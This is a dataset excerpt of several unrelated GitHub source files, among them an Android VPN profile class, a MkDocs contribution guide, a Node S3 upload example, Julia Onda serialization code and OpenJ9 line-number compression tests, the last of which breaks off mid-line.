text
stringlengths 2
100k
| meta
dict |
---|---|
define([
'geomnode',
'icons',
'toolbars/booleanitemmodel',
], function(
GeomNode,
icons,
BooleanItemModel) {
var Model = BooleanItemModel.extend({
name: 'intersect',
VertexConstructor: GeomNode.Intersect,
icon: icons['intersect'],
});
return Model;
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2011 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.internal.net;
import android.os.Parcel;
import android.os.Parcelable;
import android.text.TextUtils;
import android.util.Log;
import java.net.InetAddress;
import java.nio.charset.Charsets;
/**
* Parcel-like entity class for VPN profiles. To keep things simple, all
* fields are package private. Methods are provided for serialization, so
* storage can be implemented easily. Two rules are set for this class.
* First, all fields must be kept non-null. Second, always make a copy
* using clone() before modifying.
*
* @hide
*/
public class VpnProfile implements Cloneable, Parcelable {
private static final String TAG = "VpnProfile";
// Match these constants with R.array.vpn_types.
public static final int TYPE_PPTP = 0;
public static final int TYPE_L2TP_IPSEC_PSK = 1;
public static final int TYPE_L2TP_IPSEC_RSA = 2;
public static final int TYPE_IPSEC_XAUTH_PSK = 3;
public static final int TYPE_IPSEC_XAUTH_RSA = 4;
public static final int TYPE_IPSEC_HYBRID_RSA = 5;
public static final int TYPE_MAX = 5;
// Entity fields.
public final String key; // -1
public String name = ""; // 0
public int type = TYPE_PPTP; // 1
public String server = ""; // 2
public String username = ""; // 3
public String password = ""; // 4
public String dnsServers = ""; // 5
public String searchDomains = ""; // 6
public String routes = ""; // 7
public boolean mppe = true; // 8
public String l2tpSecret = ""; // 9
public String ipsecIdentifier = "";// 10
public String ipsecSecret = ""; // 11
public String ipsecUserCert = ""; // 12
public String ipsecCaCert = ""; // 13
public String ipsecServerCert = "";// 14
// Helper fields.
public boolean saveLogin = false;
public VpnProfile(String key) {
this.key = key;
}
public VpnProfile(Parcel in) {
key = in.readString();
name = in.readString();
type = in.readInt();
server = in.readString();
username = in.readString();
password = in.readString();
dnsServers = in.readString();
searchDomains = in.readString();
routes = in.readString();
mppe = in.readInt() != 0;
l2tpSecret = in.readString();
ipsecIdentifier = in.readString();
ipsecSecret = in.readString();
ipsecUserCert = in.readString();
ipsecCaCert = in.readString();
ipsecServerCert = in.readString();
saveLogin = in.readInt() != 0;
}
@Override
public void writeToParcel(Parcel out, int flags) {
out.writeString(key);
out.writeString(name);
out.writeInt(type);
out.writeString(server);
out.writeString(username);
out.writeString(password);
out.writeString(dnsServers);
out.writeString(searchDomains);
out.writeString(routes);
out.writeInt(mppe ? 1 : 0);
out.writeString(l2tpSecret);
out.writeString(ipsecIdentifier);
out.writeString(ipsecSecret);
out.writeString(ipsecUserCert);
out.writeString(ipsecCaCert);
out.writeString(ipsecServerCert);
out.writeInt(saveLogin ? 1 : 0);
}
public static VpnProfile decode(String key, byte[] value) {
try {
if (key == null) {
return null;
}
String[] values = new String(value, Charsets.UTF_8).split("\0", -1);
// There can be 14 or 15 values in ICS MR1.
if (values.length < 14 || values.length > 15) {
return null;
}
VpnProfile profile = new VpnProfile(key);
profile.name = values[0];
profile.type = Integer.valueOf(values[1]);
if (profile.type < 0 || profile.type > TYPE_MAX) {
return null;
}
profile.server = values[2];
profile.username = values[3];
profile.password = values[4];
profile.dnsServers = values[5];
profile.searchDomains = values[6];
profile.routes = values[7];
profile.mppe = Boolean.valueOf(values[8]);
profile.l2tpSecret = values[9];
profile.ipsecIdentifier = values[10];
profile.ipsecSecret = values[11];
profile.ipsecUserCert = values[12];
profile.ipsecCaCert = values[13];
profile.ipsecServerCert = (values.length > 14) ? values[14] : "";
profile.saveLogin = !profile.username.isEmpty() || !profile.password.isEmpty();
return profile;
} catch (Exception e) {
// ignore
}
return null;
}
public byte[] encode() {
StringBuilder builder = new StringBuilder(name);
builder.append('\0').append(type);
builder.append('\0').append(server);
builder.append('\0').append(saveLogin ? username : "");
builder.append('\0').append(saveLogin ? password : "");
builder.append('\0').append(dnsServers);
builder.append('\0').append(searchDomains);
builder.append('\0').append(routes);
builder.append('\0').append(mppe);
builder.append('\0').append(l2tpSecret);
builder.append('\0').append(ipsecIdentifier);
builder.append('\0').append(ipsecSecret);
builder.append('\0').append(ipsecUserCert);
builder.append('\0').append(ipsecCaCert);
builder.append('\0').append(ipsecServerCert);
return builder.toString().getBytes(Charsets.UTF_8);
}
/**
* Test if profile is valid for lockdown, which requires IPv4 address for
* both server and DNS. Server hostnames would require using DNS before
* connection.
*/
public boolean isValidLockdownProfile() {
try {
InetAddress.parseNumericAddress(server);
for (String dnsServer : dnsServers.split(" +")) {
InetAddress.parseNumericAddress(this.dnsServers);
}
if (TextUtils.isEmpty(dnsServers)) {
Log.w(TAG, "DNS required");
return false;
}
// Everything checked out above
return true;
} catch (IllegalArgumentException e) {
Log.w(TAG, "Invalid address", e);
return false;
}
}
public static final Creator<VpnProfile> CREATOR = new Creator<VpnProfile>() {
@Override
public VpnProfile createFromParcel(Parcel in) {
return new VpnProfile(in);
}
@Override
public VpnProfile[] newArray(int size) {
return new VpnProfile[size];
}
};
@Override
public int describeContents() {
return 0;
}
}
| {
"pile_set_name": "Github"
} |
[English](./contribution-docs.md)|[中文](../zh/community/contribution-docs.md)
# Contributing documents
## Installing Python
Install [Python](https://www.python.org/) or [Anaconda](https://www.anaconda.com/).
[MkDocs](https://www.mkdocs.org/) supports Python versions 2.7, 3.4, 3.5, 3.6, 3.7 and pypy.
## Installing pip
- If you're using a recent version of Python, the Python package manager, pip,
is most likely installed by default. However, you may need to upgrade pip to the lasted version:
```
pip install --upgrade pip
```
- If you need to install pip for the first time, download get-pip.py.
Then run the following command to install it:
```shell
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python get-pip.py
```
## Installing MkDocs and dependencies
Install the mkdocs package and dependencies using pip:
```shell
pip install -r docs/requirements.txt
```
You should now have the mkdocs command installed on your system. Run `mkdocs
--version` to check that everything worked okay.
## Run mkdocs
```shell
mkdocs serve || mkdocs serve -a IP:port
```
Open browser `http://127.0.0.1:8000`

## Write markdown documents
- Create a new `.md` file in the `/docs` directory,
Chinese docs under `/docs/zh`.
- Edit `mkdocs.yml` and add pages. [Tutorial](https://www.mkdocs.org/#adding-pages)
```yml
nav:
- Home: 'index.md'
- User Guide:
- 'JDBC Doc': 'user-guide/jdbc.md'
- 'Build Doc': 'user-guide/build.md'
- 'API Doc': 'user-guide/api.md'
- Community:
- Channel: 'community.md'
- Contribution:
- Code: 'contribution-code.md'
- Docs: 'contribution-docs.md'
- About:
- 'License': 'about/license.md'
- 'Release Notes': 'about/release-notes.md'
```
## Commit
Push your all changes and open a PR. | {
"pile_set_name": "Github"
} |
---
title: ERC721 & Crypto-Collectibles
header: "Lesson 5: ERC721 & Crypto-Collectibles"
roadmap: roadmap5.jpg
path: solidity
---
Whew! Things are starting to heat up in here...
In this lesson, we're going to get a bit more advanced.
We're going to talk about **tokens**, the **ERC721** standard, and **crypto-collectible assets**.
In other words, we're going to **make it so you can trade your zombies with your friends.**
| {
"pile_set_name": "Github"
} |
config ISO9660_FS
tristate "ISO 9660 CDROM file system support"
help
This is the standard file system used on CD-ROMs. It was previously
known as "High Sierra File System" and is called "hsfs" on other
Unix systems. The so-called Rock-Ridge extensions which allow for
long Unix filenames and symbolic links are also supported by this
driver. If you have a CD-ROM drive and want to do more with it than
just listen to audio CDs and watch its LEDs, say Y (and read
<file:Documentation/filesystems/isofs.txt> and the CD-ROM-HOWTO,
available from <http://www.tldp.org/docs.html#howto>), thereby
enlarging your kernel by about 27 KB; otherwise say N.
To compile this file system support as a module, choose M here: the
module will be called isofs.
config JOLIET
bool "Microsoft Joliet CDROM extensions"
depends on ISO9660_FS
select NLS
help
Joliet is a Microsoft extension for the ISO 9660 CD-ROM file system
which allows for long filenames in unicode format (unicode is the
new 16 bit character code, successor to ASCII, which encodes the
characters of almost all languages of the world; see
<http://www.unicode.org/> for more information). Say Y here if you
want to be able to read Joliet CD-ROMs under Linux.
config ZISOFS
bool "Transparent decompression extension"
depends on ISO9660_FS
select ZLIB_INFLATE
help
This is a Linux-specific extension to RockRidge which lets you store
data in compressed form on a CD-ROM and have it transparently
decompressed when the CD-ROM is accessed. See
<http://www.kernel.org/pub/linux/utils/fs/zisofs/> for the tools
necessary to create such a filesystem. Say Y here if you want to be
able to read such compressed CD-ROMs.
| {
"pile_set_name": "Github"
} |
var http = require('http')
, util = require('util')
, multiparty = require('../')
, knox = require('knox')
, Batch = require('batch')
, PORT = process.env.PORT || 27372
var s3Client = knox.createClient({
secure: false,
key: process.env.S3_KEY,
secret: process.env.S3_SECRET,
bucket: process.env.S3_BUCKET,
});
var server = http.createServer(function(req, res) {
if (req.url === '/') {
res.writeHead(200, {'content-type': 'text/html'});
res.end(
'<form action="/upload" enctype="multipart/form-data" method="post">'+
'<input type="text" name="path"><br>'+
'<input type="file" name="upload"><br>'+
'<input type="submit" value="Upload">'+
'</form>'
);
} else if (req.url === '/upload') {
var headers = {
'x-amz-acl': 'public-read',
};
var form = new multiparty.Form();
var batch = new Batch();
batch.push(function(cb) {
form.on('field', function(name, value) {
if (name === 'path') {
var destPath = value;
if (destPath[0] !== '/') destPath = '/' + destPath;
cb(null, destPath);
}
});
});
batch.push(function(cb) {
form.on('part', function(part) {
if (! part.filename) return;
cb(null, part);
});
});
batch.end(function(err, results) {
if (err) throw err;
form.removeListener('close', onEnd);
var destPath = results[0]
, part = results[1];
headers['Content-Length'] = part.byteCount;
s3Client.putStream(part, destPath, headers, function(err, s3Response) {
if (err) throw err;
res.statusCode = s3Response.statusCode;
s3Response.pipe(res);
console.log("https://s3.amazonaws.com/" + process.env.S3_BUCKET + destPath);
});
});
form.on('close', onEnd);
form.parse(req);
} else {
res.writeHead(404, {'content-type': 'text/plain'});
res.end('404');
}
function onEnd() {
throw new Error("no uploaded file");
}
});
server.listen(PORT, function() {
console.info('listening on http://0.0.0.0:'+PORT+'/');
});
| {
"pile_set_name": "Github"
} |
#####
##### MsgPack conversions for Base types
#####
MsgPack.msgpack_type(::Type{Nanosecond}) = MsgPack.IntegerType()
MsgPack.from_msgpack(::Type{Nanosecond}, x::Integer) = Nanosecond(x)
MsgPack.to_msgpack(::MsgPack.IntegerType, x::Nanosecond) = x.value
MsgPack.msgpack_type(::Type{VersionNumber}) = MsgPack.StringType()
MsgPack.from_msgpack(::Type{VersionNumber}, x::String) = VersionNumber(x[2:end])
MsgPack.to_msgpack(::MsgPack.StringType, x::VersionNumber) = string('v', x)
MsgPack.msgpack_type(::Type{UUID}) = MsgPack.StringType()
MsgPack.from_msgpack(::Type{UUID}, x::String) = UUID(x)
MsgPack.to_msgpack(::MsgPack.StringType, x::UUID) = string(x)
MsgPack.msgpack_type(::Type{DataType}) = MsgPack.StringType()
function MsgPack.from_msgpack(::Type{DataType}, x::String)
return julia_type_from_onda_sample_type(x)
end
function MsgPack.to_msgpack(::MsgPack.StringType, T::DataType)
return onda_sample_type_from_julia_type(T)
end
#####
##### Julia DataType <--> Onda `sample_type` string
#####
function julia_type_from_onda_sample_type(t::AbstractString)
t == "int8" && return Int8
t == "int16" && return Int16
t == "int32" && return Int32
t == "int64" && return Int64
t == "uint8" && return UInt8
t == "uint16" && return UInt16
t == "uint32" && return UInt32
t == "uint64" && return UInt64
return error("sample type ", t, " is not supported by Onda")
end
function onda_sample_type_from_julia_type(T::Type)
T === Int8 && return "int8"
T === Int16 && return "int16"
T === Int32 && return "int32"
T === Int64 && return "int64"
T === UInt8 && return "uint8"
T === UInt16 && return "uint16"
T === UInt32 && return "uint32"
T === UInt64 && return "uint64"
return error("sample type ", T, " is not supported by Onda")
end
#####
##### annotations
#####
"""
Annotation <: AbstractTimeSpan
A type representing an individual Onda annotation object. Instances contain
the following fields, following the Onda specification for annotation objects:
- `value::String`
- `start_nanosecond::Nanosecond`
- `stop_nanosecond::Nanosecond`
"""
struct Annotation <: AbstractTimeSpan
value::String
start_nanosecond::Nanosecond
stop_nanosecond::Nanosecond
function Annotation(value::AbstractString, start::Nanosecond, stop::Nanosecond)
_validate_timespan(start, stop)
return new(value, start, stop)
end
end
MsgPack.msgpack_type(::Type{Annotation}) = MsgPack.StructType()
function Annotation(value, span::AbstractTimeSpan)
return Annotation(value, first(span), last(span))
end
Base.first(annotation::Annotation) = annotation.start_nanosecond
Base.last(annotation::Annotation) = annotation.stop_nanosecond
#####
##### signals
#####
"""
Signal
A type representing an individual Onda signal object. Instances contain
the following fields, following the Onda specification for signal objects:
- `channel_names::Vector{Symbol}`
- `start_nanosecond::Nanosecond`
- `stop_nanosecond::Nanosecond`
- `sample_unit::Symbol`
- `sample_resolution_in_unit::Float64`
- `sample_offset_in_unit::Float64`
- `sample_type::DataType`
- `sample_rate::Float64`
- `file_extension::Symbol`
- `file_options::Union{Nothing,Dict{Symbol,Any}}`
"""
Base.@kwdef struct Signal
channel_names::Vector{Symbol}
start_nanosecond::Nanosecond
stop_nanosecond::Nanosecond
sample_unit::Symbol
sample_resolution_in_unit::Float64
sample_offset_in_unit::Float64
sample_type::DataType
sample_rate::Float64
file_extension::Symbol
file_options::Union{Nothing,Dict{Symbol,Any}}
function Signal(channel_names, start_nanosecond, stop_nanosecond, sample_unit,
sample_resolution_in_unit, sample_offset_in_unit, sample_type,
sample_rate, file_extension, file_options)
_validate_timespan(start_nanosecond, stop_nanosecond)
return new(channel_names, start_nanosecond, stop_nanosecond, sample_unit,
sample_resolution_in_unit, sample_offset_in_unit, sample_type,
sample_rate, file_extension, file_options)
end
end
function Base.:(==)(a::Signal, b::Signal)
return all(name -> getfield(a, name) == getfield(b, name), fieldnames(Signal))
end
MsgPack.msgpack_type(::Type{Signal}) = MsgPack.StructType()
function is_valid(signal::Signal)
return is_lower_snake_case_alphanumeric(string(signal.sample_unit)) &&
all(n -> is_lower_snake_case_alphanumeric(string(n), ('-', '.')),
signal.channel_names) &&
onda_sample_type_from_julia_type(signal.sample_type) isa AbstractString
end
function file_option(signal::Signal, name, default)
signal.file_options isa Dict && return get(signal.file_options, name, default)
return default
end
"""
signal_from_template(signal::Signal;
channel_names=signal.channel_names,
start_nanosecond=signal.start_nanosecond,
stop_nanosecond=signal.stop_nanosecond,
sample_unit=signal.sample_unit,
sample_resolution_in_unit=signal.sample_resolution_in_unit,
sample_offset_in_unit=signal.sample_offset_in_unit,
sample_type=signal.sample_type,
sample_rate=signal.sample_rate,
file_extension=signal.file_extension,
file_options=signal.file_options)
Return a `Signal` where each field is mapped to the corresponding keyword argument.
"""
function signal_from_template(signal::Signal; channel_names=signal.channel_names,
start_nanosecond=signal.start_nanosecond,
stop_nanosecond=signal.stop_nanosecond,
sample_unit=signal.sample_unit,
sample_resolution_in_unit=signal.sample_resolution_in_unit,
sample_offset_in_unit=signal.sample_offset_in_unit,
sample_type=signal.sample_type,
sample_rate=signal.sample_rate,
file_extension=signal.file_extension,
file_options=signal.file_options)
return Signal(channel_names, start_nanosecond, stop_nanosecond, sample_unit,
sample_resolution_in_unit, sample_offset_in_unit, sample_type,
sample_rate, file_extension, file_options)
end
"""
channel(signal::Signal, name::Symbol)
Return `i` where `signal.channel_names[i] == name`.
"""
function channel(signal::Signal, name::Symbol)
return findfirst(isequal(name), signal.channel_names)
end
"""
channel(signal::Signal, i::Integer)
Return `signal.channel_names[i]`.
"""
channel(signal::Signal, i::Integer) = signal.channel_names[i]
"""
channel_count(signal::Signal)
Return `length(signal.channel_names)`.
"""
channel_count(signal::Signal) = length(signal.channel_names)
"""
span(signal::Signal)
Return `TimeSpan(signal.start_nanosecond, signal.stop_nanosecond)`.
"""
span(signal::Signal) = TimeSpan(signal.start_nanosecond, signal.stop_nanosecond)
"""
duration(signal::Signal)
Return `duration(span(signal))`.
"""
duration(signal::Signal) = duration(span(signal))
"""
sample_count(signal::Signal)
Return the number of multichannel samples that fit within `duration(signal)`
given `signal.sample_rate`.
"""
function sample_count(signal::Signal)
return index_from_time(signal.sample_rate, duration(signal)) - 1
end
"""
sizeof_samples(signal::Signal)
Returns the expected size (in bytes) of the encoded `Samples` object corresponding
to the entirety of `signal`:
sample_count(signal) * channel_count(signal) * sizeof(signal.sample_type)
"""
function sizeof_samples(signal::Signal)
return sample_count(signal) * channel_count(signal) * sizeof(signal.sample_type)
end
#####
##### recordings
#####
"""
Recording
A type representing an individual Onda recording object. Instances contain
the following fields, following the Onda specification for recording objects:
- `signals::Dict{Symbol,Signal}`
- `annotations::Set{Annotation}`
"""
struct Recording
signals::Dict{Symbol,Signal}
annotations::Set{Annotation}
end
function Base.:(==)(a::Recording, b::Recording)
return all(name -> getfield(a, name) == getfield(b, name), fieldnames(Recording))
end
MsgPack.msgpack_type(::Type{Recording}) = MsgPack.StructType()
"""
annotate!(recording::Recording, annotation::Annotation)
Returns `push!(recording.annotations, annotation)`.
"""
function annotate!(recording::Recording, annotation::Annotation)
return push!(recording.annotations, annotation)
end
"""
duration(recording::Recording)
Returns `maximum(s -> s.stop_nanosecond, values(recording.signals))`; throws an
`ArgumentError` if `recording.signals` is empty.
"""
function duration(recording::Recording)
isempty(recording.signals) &&
throw(ArgumentError("`duration(recording)` is not defined if `isempty(recording.signals)`"))
return maximum(s -> s.stop_nanosecond, values(recording.signals))
end
"""
set_span!(recording::Recording, name::Symbol, span::AbstractTimeSpan)
Replace `recording.signals[name]` with a copy that has the `start_nanosecond`
and `start_nanosecond` fields set to match the provided `span`. Returns the
newly constructed `Signal` instance.
"""
function set_span!(recording::Recording, name::Symbol, span::AbstractTimeSpan)
signal = signal_from_template(recording.signals[name]; start_nanosecond=first(span),
stop_nanosecond=last(span))
recording.signals[name] = signal
return signal
end
"""
set_span!(recording::Recording, span::TimeSpan)
Return `Dict(name => set_span!(recording, name, span) for name in keys(recording.signals))`
"""
function set_span!(recording::Recording, span::AbstractTimeSpan)
return Dict(name => set_span!(recording, name, span)
for name in keys(recording.signals))
end
#####
##### reading/writing `recordings.msgpack.zst`
#####
struct Header
onda_format_version::VersionNumber
ordered_keys::Bool
end
MsgPack.msgpack_type(::Type{Header}) = MsgPack.StructType()
function read_recordings_file(path)
file_path = joinpath(path, "recordings.msgpack.zst")
bytes = zstd_decompress(read(file_path))
io = IOBuffer(bytes)
# `0x92` is the MessagePack byte prefix for 2-element array
read(io, UInt8) == 0x92 || error("recordings.msgpack.zst has bad byte prefix")
header = MsgPack.unpack(io, Header)
if !is_supported_onda_format_version(header.onda_format_version)
@warn("attempting to load `Dataset` with unsupported Onda version",
supported = ONDA_FORMAT_VERSION, attempting = header.onda_format_version)
@warn("consider upgrading old datasets via `Onda.upgrade_onda_format_from_v0_2_to_v0_3!`")
end
strict = header.ordered_keys ? (Recording,) : ()
recordings = MsgPack.unpack(io, Dict{UUID,Recording}; strict=strict)
return header, recordings
end
function write_recordings_file(path, header::Header, recordings::Dict{UUID,Recording})
file_path = joinpath(path, "recordings.msgpack.zst")
backup_file_path = joinpath(path, "_recordings.msgpack.zst.backup")
isfile(file_path) && mv(file_path, backup_file_path)
io = IOBuffer()
MsgPack.pack(io, [header, recordings])
bytes = zstd_compress(resize!(io.data, io.size))
write(file_path, bytes)
rm(backup_file_path; force=true)
return nothing
end
| {
"pile_set_name": "Github"
} |
<!--
-
- This file is part of the OpenLink Software Virtuoso Open-Source (VOS)
- project.
-
- Copyright (C) 1998-2020 OpenLink Software
-
- This project is free software; you can redistribute it and/or modify it
- under the terms of the GNU General Public License as published by the
- Free Software Foundation; only version 2 of the License, dated June 1991.
-
- This program is distributed in the hope that it will be useful, but
- WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- General Public License for more details.
-
- You should have received a copy of the GNU General Public License along
- with this program; if not, write to the Free Software Foundation, Inc.,
- 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
-
-
-->
<init>
<src load_at_start="" load_to_clean="so_s_32.sql"/>
<deps item="SOAPDEMO" example="SO-S-1" type="user" />
<src start="services.vsmx" link="/services/services.vsmx"/>
<run name="/services/services.vsmx" link="/services/services.vsmx"/>
<http_threads val="2" />
</init>
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2001, 2014 IBM Corp. and others
*
* This program and the accompanying materials are made available under
* the terms of the Eclipse Public License 2.0 which accompanies this
* distribution and is available at https://www.eclipse.org/legal/epl-2.0/
* or the Apache License, Version 2.0 which accompanies this distribution and
* is available at https://www.apache.org/licenses/LICENSE-2.0.
*
* This Source Code may also be made available under the following
* Secondary Licenses when the conditions for such availability set
* forth in the Eclipse Public License, v. 2.0 are satisfied: GNU
* General Public License, version 2 with the GNU Classpath
* Exception [1] and GNU General Public License, version 2 with the
* OpenJDK Assembly Exception [2].
*
* [1] https://www.gnu.org/software/classpath/license.html
* [2] http://openjdk.java.net/legal/assembly-exception.html
*
* SPDX-License-Identifier: EPL-2.0 OR Apache-2.0 OR GPL-2.0 WITH Classpath-exception-2.0 OR LicenseRef-GPL-2.0 WITH Assembly-exception
*******************************************************************************/
#include "j9comp.h"
#include "j9.h"
#include "testHelpers.h"
#include "cfr.h"
#include "rommeth.h"
#include <stdlib.h> /* used for rand() */
/**
* It will verify the compression and decompression of the line number table
* It will try every possibilities of PC between rangePCLow and rangePCHigh
* and of lineNumber between rangeLineLow and rangeLineHigh
* @param portLib Pointer to the port library.
* @param id Pointer to the test name.
* @param rangePCLow
* @param rangePCHigh
* @param rangeLineLow
* @param rangeLineHigh
* @return IDATA
*
*/
static IDATA
testLineNumberCompressionEdge(J9PortLibrary *portLib, const char * testName, U_16 rangePCLow, U_16 rangePCHigh, I_32 rangeLineLow, I_32 rangeLineHigh, I_32 maximumSize)
{
PORT_ACCESS_FROM_PORT(portLib);
U_8 * buffer = (U_8*)j9mem_allocate_memory(0xFFFF * 5, OMRMEM_CATEGORY_VM); /* maximum memory possibly needed */
U_8 * bufferInitial = buffer;
U_8 * bufferPtr = NULL;
U_16 startPCIndex;
I_32 lineNumberIndex;
J9LineNumber lineNumber;
reportTestEntry(PORTLIB, testName);
if (NULL == buffer) {
outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
return reportTestExit(PORTLIB, testName);
}
for (startPCIndex = rangePCLow; startPCIndex < rangePCHigh; startPCIndex++) {
bufferPtr = buffer;
for (lineNumberIndex = rangeLineLow; lineNumberIndex < rangeLineHigh; lineNumberIndex++) {
J9CfrLineNumberTableEntry lineNumberTableEntry;
lineNumberTableEntry.startPC = startPCIndex;
lineNumberTableEntry.lineNumber = lineNumberIndex;
if (!compressLineNumbers(&lineNumberTableEntry, 1, NULL, &bufferPtr)) {
outputErrorMessage(TEST_ERROR_ARGS, "error, the line numbers are not in order\n" );
}
}
bufferPtr = buffer;
for (lineNumberIndex = rangeLineLow; lineNumberIndex < rangeLineHigh; lineNumberIndex++) {
I_32 lineNumberOffsetIntern;
if (lineNumberIndex < 0) {
/* For the test to work, set the previous line number to 0xFFFF so that the result is positive with a negative offset */
lineNumberOffsetIntern = 0xFFFF + lineNumberIndex;
lineNumber.lineNumber = 0xFFFF;
} else {
lineNumberOffsetIntern = lineNumberIndex;
lineNumber.lineNumber = 0;
}
lineNumber.location = 0;
if (!getNextLineNumberFromTable(&bufferPtr, &lineNumber)) {
outputErrorMessage(TEST_ERROR_ARGS, "error in getNextLineNumberFromTable, byte format not recognized\n" );
}
if ((lineNumber.lineNumber != lineNumberOffsetIntern) || (lineNumber.location != startPCIndex)) {
outputErrorMessage(TEST_ERROR_ARGS, "Original lineNumber:%d, location:%d \n",lineNumberOffsetIntern, startPCIndex);
outputErrorMessage(TEST_ERROR_ARGS, "Compressed lineNumber:%d, location:%d \n",lineNumber.lineNumber, lineNumber.location);
}
}
}
outputComment(PORTLIB, "Total size of: %d\n", bufferPtr - buffer);
if ((bufferPtr - buffer) > maximumSize) {
outputErrorMessage(TEST_ERROR_ARGS, "Compression is less efficient, it used to take %d bytes and it takes %d bytes \n", maximumSize, bufferPtr - buffer);
}
j9mem_free_memory(buffer);
return reportTestExit(PORTLIB, testName);
}
/**
* This tests test the delta encoding component of the compression of the line number table
* @param portLib Pointer to the port library.
* @param id Pointer to the test name.
* @return IDATA
*
*/
static IDATA
testLineNumberCompressionDeltaEncoding(J9PortLibrary *portLib, const char * testName, I_32 from, I_32 to, I_32 increment)
{
PORT_ACCESS_FROM_PORT(portLib);
U_8 * buffer = (U_8*)j9mem_allocate_memory(0xFFFF * 5, OMRMEM_CATEGORY_VM); /* maximum memory possibly needed */
U_8 * bufferPtr;
I_32 lineNumberOffset, pcOffset, lastPCOffset = 0;
J9LineNumber lineNumber;
J9CfrLineNumberTableEntry lastLineNumberTableEntry;
I_32 incrementPositive = increment > 0 ? increment : -increment;
lastLineNumberTableEntry.startPC = 0;
lastLineNumberTableEntry.lineNumber = 0;
reportTestEntry(PORTLIB, testName);
if (NULL == buffer) {
outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
return reportTestExit(PORTLIB, testName);
}
bufferPtr = buffer;
pcOffset = 0;
/* The pcOffset should always increment, it's delta cannot be negative */
for (lineNumberOffset = from; lineNumberOffset != to; lineNumberOffset += increment, pcOffset += incrementPositive) {
J9CfrLineNumberTableEntry lineNumberTableEntry;
lineNumberTableEntry.startPC = pcOffset;
lineNumberTableEntry.lineNumber = lineNumberOffset;
if (!compressLineNumbers(&lineNumberTableEntry, 1, &lastLineNumberTableEntry, &bufferPtr)) {
outputErrorMessage(TEST_ERROR_ARGS, "error, the line numbers are not in order\n" );
}
lastLineNumberTableEntry = lineNumberTableEntry;
}
lineNumber.lineNumber = 0;
lineNumber.location = 0;
bufferPtr = buffer;
pcOffset = 0;
for (lineNumberOffset = from; lineNumberOffset != to; lineNumberOffset += increment, pcOffset += incrementPositive) {
if (!getNextLineNumberFromTable(&bufferPtr, &lineNumber)) {
outputErrorMessage(TEST_ERROR_ARGS, "error in getNextLineNumberFromTable, byte format not recognized\n" );
}
if ((lineNumber.lineNumber != lineNumberOffset) || (lineNumber.location != pcOffset)) {
outputErrorMessage(TEST_ERROR_ARGS, "Original lineNumber:%d, location:%d \n",lineNumberOffset, pcOffset);
outputErrorMessage(TEST_ERROR_ARGS, "Compressed lineNumber:%d, location:%d \n",lineNumber.lineNumber, lineNumber.location);
}
}
j9mem_free_memory(buffer);
return reportTestExit(PORTLIB, testName);
}
static IDATA
testLineNumberCompressionNegativeOffsetError(J9PortLibrary *portLib, const char * testName)
{
PORT_ACCESS_FROM_PORT(portLib);
U_8 * buffer = (U_8*)j9mem_allocate_memory(5, OMRMEM_CATEGORY_VM);
U_8 * bufferPtr = buffer;
J9CfrLineNumberTableEntry line1, line2;
line1.startPC = 4;
line1.lineNumber = 4;
line2.startPC = 3;
line2.lineNumber = 4;
if (NULL == buffer) {
outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
return reportTestExit(PORTLIB, testName);
}
reportTestEntry(PORTLIB, testName);
if (compressLineNumbers(&line2, 1, &line1, &bufferPtr)) {
outputErrorMessage(TEST_ERROR_ARGS, "Error, compressLineNumbers should give an error when the startPC are not increasing. \n" );
}
j9mem_free_memory(buffer);
return reportTestExit(PORTLIB, testName);
}
static IDATA
testLineNumberRandomCompressionDecompression(J9PortLibrary *portLib, const char * testName)
{
PORT_ACCESS_FROM_PORT(portLib);
J9CfrLineNumberTableEntry * bufferOriginal = (J9CfrLineNumberTableEntry*)j9mem_allocate_memory(0xFFFF * sizeof(J9CfrLineNumberTableEntry), OMRMEM_CATEGORY_VM);
J9CfrLineNumberTableEntry * bufferOriginalPtr;
U_8 * bufferCompressed = (U_8*)j9mem_allocate_memory(0xFFFF * 5, OMRMEM_CATEGORY_VM);
U_8 * bufferCompressedPtr;
U_16 countLineNumber;
UDATA i, pass = 0;
J9LineNumber lineNumber;
J9CfrLineNumberTableEntry lineNumberTableEntry;
reportTestEntry(PORTLIB, testName);
if (NULL == bufferOriginal) {
outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
return reportTestExit(PORTLIB, testName);
}
if (NULL == bufferCompressed) {
outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
return reportTestExit(PORTLIB, testName);
}
for (pass = 0; pass < 1000000; pass++) {
countLineNumber = 0;
bufferCompressedPtr = bufferCompressed;
bufferOriginalPtr = bufferOriginal;
lineNumberTableEntry.startPC = 0;
lineNumberTableEntry.lineNumber = 0;
lineNumber.lineNumber = 0;
lineNumber.location = 0;
while ((lineNumberTableEntry.startPC < 0xFFFF) && (lineNumberTableEntry.lineNumber < 0xFFFF)) {
*bufferOriginalPtr = lineNumberTableEntry;
bufferOriginalPtr++;
countLineNumber++;
lineNumberTableEntry.startPC += rand() % 0xFFFF;
lineNumberTableEntry.lineNumber += rand() % 0xFFFF;
}
if (!compressLineNumbers(bufferOriginal, countLineNumber, NULL, &bufferCompressedPtr)) {
outputErrorMessage(TEST_ERROR_ARGS, "error, the line numbers are not in order\n" );
}
bufferCompressedPtr = bufferCompressed;
bufferOriginalPtr = bufferOriginal;
for (i = 0; i < countLineNumber; i++) {
if (!getNextLineNumberFromTable(&bufferCompressedPtr, &lineNumber)) {
outputErrorMessage(TEST_ERROR_ARGS, "error in getNextLineNumberFromTable, byte format not recognized\n" );
}
if ((bufferOriginalPtr->startPC != lineNumber.location) || (bufferOriginalPtr->lineNumber != lineNumber.lineNumber)) {
outputErrorMessage(TEST_ERROR_ARGS, "The compressed value is different to the original value. \n\
